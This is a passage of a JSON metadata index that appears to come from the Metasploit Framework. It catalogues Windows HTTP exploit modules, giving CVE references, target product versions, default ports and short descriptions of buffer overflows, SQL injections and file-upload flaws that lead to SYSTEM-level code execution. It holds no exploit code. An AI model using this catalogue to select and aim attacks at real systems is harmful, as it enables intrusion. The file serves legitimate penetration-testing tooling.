"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Windows XP SP3 English"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/http/belkin_bulldog.rb",
"is_install_path": true,
"ref_name": "windows/http/belkin_bulldog",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/ca_arcserve_rpc_authbypass": {
"name": "CA Arcserve D2D GWT RPC Credential Information Disclosure",
"full_name": "exploit/windows/http/ca_arcserve_rpc_authbypass",
"rank": 600,
"disclosure_date": "2011-07-25",
"type": "exploit",
"author": [
"bannedit <bannedit@metasploit.com>",
"rgod"
],
"description": "This module exploits an information disclosure vulnerability in the CA Arcserve\n D2D r15 web server. The information disclosure can be triggered by sending a\n specially crafted RPC request to the homepage servlet. This causes CA Arcserve to\n disclosure the username and password in cleartext used for authentication. This\n username and password pair are Windows credentials with Administrator access.",
"references": [
"CVE-2011-3011",
"OSVDB-74162",
"EDB-17574"
],
"platform": "Windows",
"arch": "",
"rport": 8014,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/http/ca_arcserve_rpc_authbypass.rb",
"is_install_path": true,
"ref_name": "windows/http/ca_arcserve_rpc_authbypass",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/ca_igateway_debug": {
"name": "CA iTechnology iGateway Debug Mode Buffer Overflow",
"full_name": "exploit/windows/http/ca_igateway_debug",
"rank": 200,
"disclosure_date": "2005-10-06",
"type": "exploit",
"author": [
"aushack <patrick@osisecurity.com.au>"
],
"description": "This module exploits a vulnerability in the Computer Associates\n iTechnology iGateway component. When <Debug>True</Debug> is enabled\n in igateway.conf (non-default), it is possible to overwrite the stack\n and execute code remotely. This module works best with Ordinal payloads.",
"references": [
"CVE-2005-3190",
"OSVDB-19920",
"URL-http://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=33485",
"EDB-1243",
"BID-15025"
],
"platform": "Windows",
"arch": "",
"rport": 5250,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"iGateway 3.0.40621.0"
],
"mod_time": "2017-11-09 03:00:24 +0000",
"path": "/modules/exploits/windows/http/ca_igateway_debug.rb",
"is_install_path": true,
"ref_name": "windows/http/ca_igateway_debug",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/ca_totaldefense_regeneratereports": {
"name": "CA Total Defense Suite reGenerateReports Stored Procedure SQL Injection",
"full_name": "exploit/windows/http/ca_totaldefense_regeneratereports",
"rank": 600,
"disclosure_date": "2011-04-13",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a SQL injection flaw in CA Total Defense Suite R12.\n When supplying a specially crafted soap request to '/UNCWS/Management.asmx', an\n attacker can abuse the reGenerateReports stored procedure by injecting arbitrary sql\n statements into the ReportIDs element.",
"references": [
"ZDI-11-134",
"OSVDB-74968",
"CVE-2011-1653"
],
"platform": "Windows",
"arch": "",
"rport": 34443,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Windows Universal"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/http/ca_totaldefense_regeneratereports.rb",
"is_install_path": true,
"ref_name": "windows/http/ca_totaldefense_regeneratereports",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/cogent_datahub_command": {
"name": "Cogent DataHub Command Injection",
"full_name": "exploit/windows/http/cogent_datahub_command",
"rank": 0,
"disclosure_date": "2014-04-29",
"type": "exploit",
"author": [
"John Leitch",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits an injection vulnerability in Cogent DataHub prior\n to 7.3.5. The vulnerability exists in the GetPermissions.asp page, which\n makes insecure use of the datahub_command function with user controlled\n data, allowing execution of arbitrary datahub commands and scripts. This\n module has been tested successfully with Cogent DataHub 7.3.4 on\n Windows 7 SP1. Please also note that after exploitation, the remote service\n will most likely hang and restart manually.",
"references": [
"ZDI-14-136",
"CVE-2014-3789",
"BID-67486"
],
"platform": "Windows",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Cogent DataHub < 7.3.5"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/http/cogent_datahub_command.rb",
"is_install_path": true,
"ref_name": "windows/http/cogent_datahub_command",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/cogent_datahub_request_headers_bof": {
"name": "Cogent DataHub HTTP Server Buffer Overflow",
"full_name": "exploit/windows/http/cogent_datahub_request_headers_bof",
"rank": 300,
"disclosure_date": "2013-07-26",
"type": "exploit",
"author": [
"rgod <rgod@autistici.org>",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a stack based buffer overflow on Cogent DataHub 7.3.0. The\n vulnerability exists in the HTTP server. While handling HTTP headers, a\n strncpy() function is used in a dangerous way. This module has been tested\n successfully on Cogent DataHub 7.3.0 (Demo) on Windows XP SP3.",
"references": [
"CVE-2013-0680",
"OSVDB-95819",
"BID-53455",
"ZDI-13-178",
"URL-http://www.cogentdatahub.com/Info/130712_ZDI-CAN-1915_Response.html"
],
"platform": "Windows",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Windows XP SP3 English / Cogent DataHub 7.3.0"
],
"mod_time": "2018-07-09 13:22:08 +0000",
"path": "/modules/exploits/windows/http/cogent_datahub_request_headers_bof.rb",
"is_install_path": true,
"ref_name": "windows/http/cogent_datahub_request_headers_bof",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/coldfusion_fckeditor": {
"name": "ColdFusion 8.0.1 Arbitrary File Upload and Execute",
"full_name": "exploit/windows/http/coldfusion_fckeditor",
"rank": 600,
"disclosure_date": "2009-07-03",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits the Adobe ColdFusion 8.0.1 FCKeditor 'CurrentFolder' File Upload\n and Execute vulnerability.",
"references": [
"CVE-2009-2265",
"OSVDB-55684"
],
"platform": "Windows",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Universal Windows Target"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/http/coldfusion_fckeditor.rb",
"is_install_path": true,
"ref_name": "windows/http/coldfusion_fckeditor",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/cyclope_ess_sqli": {
"name": "Cyclope Employee Surveillance Solution v6 SQL Injection",
"full_name": "exploit/windows/http/cyclope_ess_sqli",
"rank": 600,
"disclosure_date": "2012-08-08",
"type": "exploit",
"author": [
"loneferret",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits a SQL injection found in Cyclope Employee Surveillance\n Solution. Because the login script does not properly handle the user-supplied\n username parameter, a malicious user can manipulate the SQL query, and allows\n arbitrary code execution under the context of 'SYSTEM'.",
"references": [
"OSVDB-84517",
"EDB-20393"
],
"platform": "Windows",
"arch": "",
"rport": 7879,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Cyclope Employee Surveillance Solution v6.2 or older"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/http/cyclope_ess_sqli.rb",
"is_install_path": true,
"ref_name": "windows/http/cyclope_ess_sqli",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/desktopcentral_file_upload": {
"name": "ManageEngine Desktop Central AgentLogUpload Arbitrary File Upload",
"full_name": "exploit/windows/http/desktopcentral_file_upload",
"rank": 600,
"disclosure_date": "2013-11-11",
"type": "exploit",
"author": [
"Thomas Hibbert <thomas.hibbert@security-assessment.com>"
],
"description": "This module exploits an arbitrary file upload vulnerability in Desktop Central v7 to\n v8 build 80293. A malicious user can upload a JSP file into the web root without\n authentication, leading to arbitrary code execution as SYSTEM.",
"references": [
"CVE-2013-7390",
"OSVDB-100008",
"URL-http://security-assessment.com/files/documents/advisory/Desktop%20Central%20Arbitrary%20File%20Upload.pdf",
"URL-https://seclists.org/fulldisclosure/2013/Nov/130"
],
"platform": "Windows",
"arch": "x86",
"rport": 8020,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Desktop Central v7 - v8 build 80292 / Windows"
],
"mod_time": "2018-09-15 18:54:45 +0000",
"path": "/modules/exploits/windows/http/desktopcentral_file_upload.rb",
"is_install_path": true,
"ref_name": "windows/http/desktopcentral_file_upload",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/desktopcentral_statusupdate_upload": {
"name": "ManageEngine Desktop Central StatusUpdate Arbitrary File Upload",
"full_name": "exploit/windows/http/desktopcentral_statusupdate_upload",
"rank": 600,
"disclosure_date": "2014-08-31",
"type": "exploit",
"author": [
"Pedro Ribeiro <pedrib@gmail.com>"
],
"description": "This module exploits an arbitrary file upload vulnerability in ManageEngine DesktopCentral\n v7 to v9 build 90054 (including the MSP versions).\n A malicious user can upload a JSP file into the web root without authentication, leading to\n arbitrary code execution as SYSTEM. Some early builds of version 7 are not exploitable as\n they do not ship with a bundled Java compiler.",
"references": [
"CVE-2014-5005",
"OSVDB-110643",
"URL-https://seclists.org/fulldisclosure/2014/Aug/88"
],
"platform": "Windows",
"arch": "x86",
"rport": 8020,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Desktop Central v7 to v9 build 90054 / Windows"
],
"mod_time": "2018-09-15 18:54:45 +0000",
"path": "/modules/exploits/windows/http/desktopcentral_statusupdate_upload.rb",
"is_install_path": true,
"ref_name": "windows/http/desktopcentral_statusupdate_upload",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/disk_pulse_enterprise_bof": {
"name": "Disk Pulse Enterprise Login Buffer Overflow",
"full_name": "exploit/windows/http/disk_pulse_enterprise_bof",
"rank": 600,
"disclosure_date": "2016-10-03",
"type": "exploit",
"author": [
"Chris Higgins",
"Tulpa Security"
],
"description": "This module exploits a stack buffer overflow in Disk Pulse Enterprise\n 9.0.34. If a malicious user sends a malicious HTTP login request,\n it is possible to execute a payload that would run under the Windows\n NT AUTHORITY\\SYSTEM account. Due to size constraints, this module\n uses the Egghunter technique.",
"references": [
"EDB-40452"
],
"platform": "Windows",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Disk Pulse Enterprise 9.0.34"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/http/disk_pulse_enterprise_bof.rb",
"is_install_path": true,
"ref_name": "windows/http/disk_pulse_enterprise_bof",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/disk_pulse_enterprise_get": {
"name": "Disk Pulse Enterprise GET Buffer Overflow",
"full_name": "exploit/windows/http/disk_pulse_enterprise_get",
"rank": 600,
"disclosure_date": "2017-08-25",
"type": "exploit",
"author": [
"Chance Johnson",
"Nipun Jaswal & Anurag Srivastava"
],
"description": "This module exploits an SEH buffer overflow in Disk Pulse Enterprise\n 9.9.16. If a malicious user sends a crafted HTTP GET request\n it is possible to execute a payload that would run under the Windows\n NT AUTHORITY\\SYSTEM account.",
"references": [
"EDB-42560"
],
"platform": "Windows",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Disk Pulse Enterprise 9.9.16"
],
"mod_time": "2017-09-13 11:46:57 +0000",
"path": "/modules/exploits/windows/http/disk_pulse_enterprise_get.rb",
"is_install_path": true,
"ref_name": "windows/http/disk_pulse_enterprise_get",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/diskboss_get_bof": {
"name": "DiskBoss Enterprise GET Buffer Overflow",
"full_name": "exploit/windows/http/diskboss_get_bof",
"rank": 600,
"disclosure_date": "2016-12-05",
"type": "exploit",
"author": [
"vportal",
"Ahmad Mahfouz",
"Gabor Seljan",
"Jacob Robles"
],
"description": "This module exploits a stack-based buffer overflow vulnerability\n in the web interface of DiskBoss Enterprise v7.5.12, v7.4.28, and v8.2.14,\n caused by improper bounds checking of the request path in HTTP GET\n requests sent to the built-in web server. This module has been\n tested successfully on Windows XP SP3 and Windows 7 SP1.",
"references": [
"EDB-40869",
"EDB-42395"
],
"platform": "Windows",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic Targeting",
"DiskBoss Enterprise v7.4.28",
"DiskBoss Enterprise v7.5.12",
"DiskBoss Enterprise v8.2.14"
],
"mod_time": "2017-12-08 10:42:43 +0000",
"path": "/modules/exploits/windows/http/diskboss_get_bof.rb",
"is_install_path": true,
"ref_name": "windows/http/diskboss_get_bof",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/disksavvy_get_bof": {
"name": "DiskSavvy Enterprise GET Buffer Overflow",
"full_name": "exploit/windows/http/disksavvy_get_bof",
"rank": 600,
"disclosure_date": "2016-12-01",
"type": "exploit",
"author": [
"vportal",
"Gabor Seljan"
],
"description": "This module exploits a stack-based buffer overflow vulnerability\n in the web interface of DiskSavvy Enterprise v9.1.14 and v9.3.14,\n caused by improper bounds checking of the request path in HTTP GET\n requests sent to the built-in web server. This module has been\n tested successfully on Windows XP SP3 and Windows 7 SP1.",
"references": [
"CVE-2017-6187",
"EDB-40869"
],
"platform": "Windows",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic Targeting",
"DiskSavvy Enterprise v9.1.14",
"DiskSavvy Enterprise v9.3.14"
],
"mod_time": "2018-07-12 17:34:52 +0000",
"path": "/modules/exploits/windows/http/disksavvy_get_bof.rb",
"is_install_path": true,
"ref_name": "windows/http/disksavvy_get_bof",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/disksorter_bof": {
"name": "Disk Sorter Enterprise GET Buffer Overflow",
"full_name": "exploit/windows/http/disksorter_bof",
"rank": 500,
"disclosure_date": "2017-03-15",
"type": "exploit",
"author": [
"Daniel Teixeira"
],
"description": "This module exploits a stack-based buffer overflow vulnerability\n in the web interface of Disk Sorter Enterprise v9.5.12, caused by\n improper bounds checking of the request path in HTTP GET requests\n sent to the built-in web server. This module has been tested\n successfully on Windows 7 SP1 x86.",
"references": [
"CVE-2017-7230"
],
"platform": "Windows",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Disk Sorter Enterprise v9.5.12"
],
"mod_time": "2018-07-12 17:34:52 +0000",
"path": "/modules/exploits/windows/http/disksorter_bof.rb",
"is_install_path": true,
"ref_name": "windows/http/disksorter_bof",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/dup_scout_enterprise_login_bof": {
"name": "Dup Scout Enterprise Login Buffer Overflow",
"full_name": "exploit/windows/http/dup_scout_enterprise_login_bof",
"rank": 600,
"disclosure_date": "2017-11-14",
"type": "exploit",
"author": [
"Chris Higgins",
"sickness"
],
"description": "This module exploits a stack buffer overflow in Dup Scout Enterprise\n 10.0.18. The buffer overflow exists via the web interface during\n login. This gives NT AUTHORITY\\SYSTEM access.",
"references": [
"CVE-2017-13696",
"EDB-43145"
],
"platform": "Windows",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Dup Scout Enterprise 10.0.18"
],
"mod_time": "2018-07-12 17:34:52 +0000",
"path": "/modules/exploits/windows/http/dup_scout_enterprise_login_bof.rb",
"is_install_path": true,
"ref_name": "windows/http/dup_scout_enterprise_login_bof",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/dupscts_bof": {
"name": "Dup Scout Enterprise GET Buffer Overflow",
"full_name": "exploit/windows/http/dupscts_bof",
"rank": 500,
"disclosure_date": "2017-03-15",
"type": "exploit",
"author": [
"vportal",
"Daniel Teixeira"
],
"description": "This module exploits a stack-based buffer overflow vulnerability\n in the web interface of Dup Scout Enterprise v9.5.14, caused by\n improper bounds checking of the request path in HTTP GET requests\n sent to the built-in web server. This module has been tested\n successfully on Windows 7 SP1 x86.",
"references": [
],
"platform": "Windows",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Dup Scout Enterprise v9.5.14"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/http/dupscts_bof.rb",
"is_install_path": true,
"ref_name": "windows/http/dupscts_bof",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/easychatserver_seh": {
"name": "Easy Chat Server User Registeration Buffer Overflow (SEH)",
"full_name": "exploit/windows/http/easychatserver_seh",
"rank": 300,
"disclosure_date": "2017-10-09",
"type": "exploit",
"author": [
"Marco Rivoli",
"Aitezaz Mohsin"
],
"description": "This module exploits a buffer overflow during user registration in Easy Chat Server software.",
"references": [
"EDB-42155"
],
"platform": "Windows",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Easy Chat Server 2.0 to 3.1"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/http/easychatserver_seh.rb",
"is_install_path": true,
"ref_name": "windows/http/easychatserver_seh",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/easyfilesharing_post": {
"name": "Easy File Sharing HTTP Server 7.2 POST Buffer Overflow",
"full_name": "exploit/windows/http/easyfilesharing_post",
"rank": 300,
"disclosure_date": "2017-06-12",
"type": "exploit",
"author": [
"bl4ck h4ck3r",
"Marco Rivoli <marco.rivoli.nvh@gmail.com>"
],
"description": "This module exploits a POST buffer overflow in the Easy File Sharing FTP Server 7.2 software.",
"references": [
"EDB-42186"
],
"platform": "Windows",
"arch": "",
"rport": 80,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Easy File Sharing 7.2 HTTP"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/http/easyfilesharing_post.rb",
"is_install_path": true,
"ref_name": "windows/http/easyfilesharing_post",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/easyfilesharing_seh": {
"name": "Easy File Sharing HTTP Server 7.2 SEH Overflow",
"full_name": "exploit/windows/http/easyfilesharing_seh",
"rank": 300,
"disclosure_date": "2015-12-02",
"type": "exploit",
"author": [
"Starwarsfan2099 <starwarsfan2099@gmail.com>"
],
"description": "This module exploits a SEH overflow in the Easy File Sharing FTP Server 7.2 software.",
"references": [
"EDB-39008"
],
"platform": "Windows",
"arch": "",
"rport": 80,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Easy File Sharing 7.2 HTTP"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/http/easyfilesharing_seh.rb",
"is_install_path": true,
"ref_name": "windows/http/easyfilesharing_seh",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/easyftp_list": {
"name": "EasyFTP Server list.html path Stack Buffer Overflow",
"full_name": "exploit/windows/http/easyftp_list",
"rank": 500,
"disclosure_date": "2010-02-18",
"type": "exploit",
"author": [
"ThE g0bL!N",
"jduck <jduck@metasploit.com>"
],
"description": "This module exploits a stack-based buffer overflow in EasyFTP Server 1.7.0.11\n and earlier. EasyFTP fails to check input size when parsing the 'path' parameter\n supplied to an HTTP GET request, which leads to a stack based buffer overflow.\n EasyFTP allows anonymous access by default; valid credentials are typically\n unnecessary to exploit this vulnerability.\n\n After version 1.7.0.12, this package was renamed \"UplusFtp\".\n\n Due to limited space, as well as difficulties using an egghunter, the use of\n staged, ORD, and/or shell payloads is recommended.",
"references": [
"OSVDB-66614",
"EDB-11500"
],
"platform": "Windows",
"arch": "",
"rport": 8080,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Windows XP SP3 - Easy FTP Server Universal"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/http/easyftp_list.rb",
"is_install_path": true,
"ref_name": "windows/http/easyftp_list",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"exploit_windows/http/edirectory_host": {
"name": "Novell eDirectory NDS Server Host Header Overflow",
"full_name": "exploit/windows/http/edirectory_host",
"rank": 500,
"disclosure_date": "2006-10-21",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in Novell eDirectory 8.8.1.\n The web interface does not validate the length of the\n HTTP Host header prior to using the value of that header in an\n HTTP redirect.",
"references": [
"CVE-2006-5478",
"OSVDB-29993",
"BID-20655"
],
"platform": "Windows",
"arch": "",
"rport": 8028,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Novell eDirectory 8.8.1"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/http/edirectory_host.rb",
"is_install_path": true,
"ref_name": "windows/http/edirectory_host",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/edirectory_imonitor": {
"name": "eDirectory 8.7.3 iMonitor Remote Stack Buffer Overflow",
"full_name": "exploit/windows/http/edirectory_imonitor",
"rank": 500,
"disclosure_date": "2005-08-11",
"type": "exploit",
"author": [
"Unknown",
"Matt Olney <scacynwrig@yahoo.com>"
],
"description": "This module exploits a stack buffer overflow in eDirectory 8.7.3\n iMonitor service. This vulnerability was discovered by Peter\n Winter-Smith of NGSSoftware.\n\n NOTE: repeated exploitation attempts may cause eDirectory to crash. It does\n not restart automatically in a default installation.",
"references": [
"CVE-2005-2551",
"OSVDB-18703",
"BID-14548"
],
"platform": "Windows",
"arch": "",
"rport": 8008,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Windows (ALL) - eDirectory 8.7.3 iMonitor"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/http/edirectory_imonitor.rb",
"is_install_path": true,
"ref_name": "windows/http/edirectory_imonitor",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/efs_easychatserver_username": {
"name": "EFS Easy Chat Server Authentication Request Handling Buffer Overflow",
"full_name": "exploit/windows/http/efs_easychatserver_username",
"rank": 500,
"disclosure_date": "2007-08-14",
"type": "exploit",
"author": [
"LSO <lso@hushmail.com>",
"bcoles <bcoles@gmail.com>"
],
"description": "This module exploits a stack buffer overflow in EFS Software Easy Chat\n Server versions 2.0 to 3.1. By sending an overly long authentication\n request, an attacker may be able to execute arbitrary code.",
"references": [
"CVE-2004-2466",
"OSVDB-7416",
"OSVDB-106841",
"BID-25328"
],
"platform": "Windows",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic Targeting",
"Easy Chat Server 2.0",
"Easy Chat Server 2.1 - 3.1"
],
"mod_time": "2019-01-10 19:19:14 +0000",
"path": "/modules/exploits/windows/http/efs_easychatserver_username.rb",
"is_install_path": true,
"ref_name": "windows/http/efs_easychatserver_username",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/efs_fmws_userid_bof": {
"name": "Easy File Management Web Server Stack Buffer Overflow",
"full_name": "exploit/windows/http/efs_fmws_userid_bof",
"rank": 300,
"disclosure_date": "2014-05-20",
"type": "exploit",
"author": [
"superkojiman",
"Julien Ahrens",
"TecR0c <roccogiovannicalvi@gmail.com>"
],
"description": "Easy File Management Web Server v4.0 and v5.3 contains a stack buffer\n overflow condition that is triggered as user-supplied input is not\n properly validated when handling the UserID cookie. This may allow a\n remote attacker to execute arbitrary code.",
"references": [
"CVE-2014-3791",
"OSVDB-107241",
"EDB-33610",
"BID-67542",
"URL-http://www.cnnvd.org.cn/vulnerability/show/cv_id/2014050536",
"URL-http://www.web-file-management.com/"
],
"platform": "Windows",
"arch": "x86",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic Targeting",
"Efmws 5.3 Universal",
"Efmws 4.0 Universal"
],
"mod_time": "2018-07-12 17:34:52 +0000",
"path": "/modules/exploits/windows/http/efs_fmws_userid_bof.rb",
"is_install_path": true,
"ref_name": "windows/http/efs_fmws_userid_bof",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/ektron_xslt_exec": {
"name": "Ektron 8.02 XSLT Transform Remote Code Execution",
"full_name": "exploit/windows/http/ektron_xslt_exec",
"rank": 600,
"disclosure_date": "2012-10-16",
"type": "exploit",
"author": [
"Rich Lundeen",
"juan vazquez <juan.vazquez@metasploit.com>",
"Nicolas \"Nicob\" Gregoire"
],
"description": "This module exploits a vulnerability in Ektron CMS 8.02 (before SP5). The\n vulnerability exists due to the insecure usage of XslCompiledTransform, using a\n XSLT controlled by the user. The module has been tested successfully on Ektron CMS\n 8.02 over Windows 2003 SP2, which allows to execute arbitrary code with NETWORK\n SERVICE privileges.",
"references": [
"CVE-2012-5357",
"OSVDB-88107",
"URL-http://webstersprodigy.net/2012/10/25/cve-2012-5357cve-1012-5358-cool-ektron-xslt-rce-bugs/",
"URL-http://technet.microsoft.com/en-us/security/msvr/msvr12-016"
],
"platform": "Windows",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Windows 2003 SP2 / Ektron CMS400 8.02"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/http/ektron_xslt_exec.rb",
"is_install_path": true,
"ref_name": "windows/http/ektron_xslt_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/ektron_xslt_exec_ws": {
"name": "Ektron 8.5, 8.7, 9.0 XSLT Transform Remote Code Execution",
"full_name": "exploit/windows/http/ektron_xslt_exec_ws",
"rank": 600,
"disclosure_date": "2015-02-05",
"type": "exploit",
"author": [
"catatonicprime"
],
"description": "Ektron 8.5, 8.7 <= sp1, 9.0 < sp1 have\nvulnerabilities in various operations within the ServerControlWS.asmx\nweb services. These vulnerabilities allow for RCE without authentication and\nexecute in the context of IIS on the remote system.",
"references": [
"CVE-2015-0923",
"US-CERT-VU-377644",
"URL-http://www.websecuritywatch.com/xxe-arbitrary-code-execution-in-ektron-cms/"
],
"platform": "Windows",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Windows 2008 R2 / Ektron CMS400 8.5"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/http/ektron_xslt_exec_ws.rb",
"is_install_path": true,
"ref_name": "windows/http/ektron_xslt_exec_ws",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/http/ericom_access_now_bof": {
"name": "Ericom AccessNow Server Buffer Overflow",
"full_name": "exploit/windows/http/ericom_access_now_bof",
"rank": 300,
"disclosure_date": "2014-06-02",
"type": "exploit",
"author": [
"Unknown",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a stack based buffer overflow in Ericom AccessNow Server. The\n vulnerability is due to an insecure usage of vsprintf with user controlled data,\n which can be triggered with a malformed HTTP request. This module has been tested\n successfully with Ericom AccessNow Server 2.4.0.2 on Windows XP SP3 and Windows 2003\n Server SP2.",
"references": [
"ZDI-14-160",
"CVE-2014-3913",
"BID-67777",
"URL-http://www.ericom.com/security-ERM-2014-610.asp"
],
"platform": "Windows",
"arch": "x86",
"rport": 8080,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
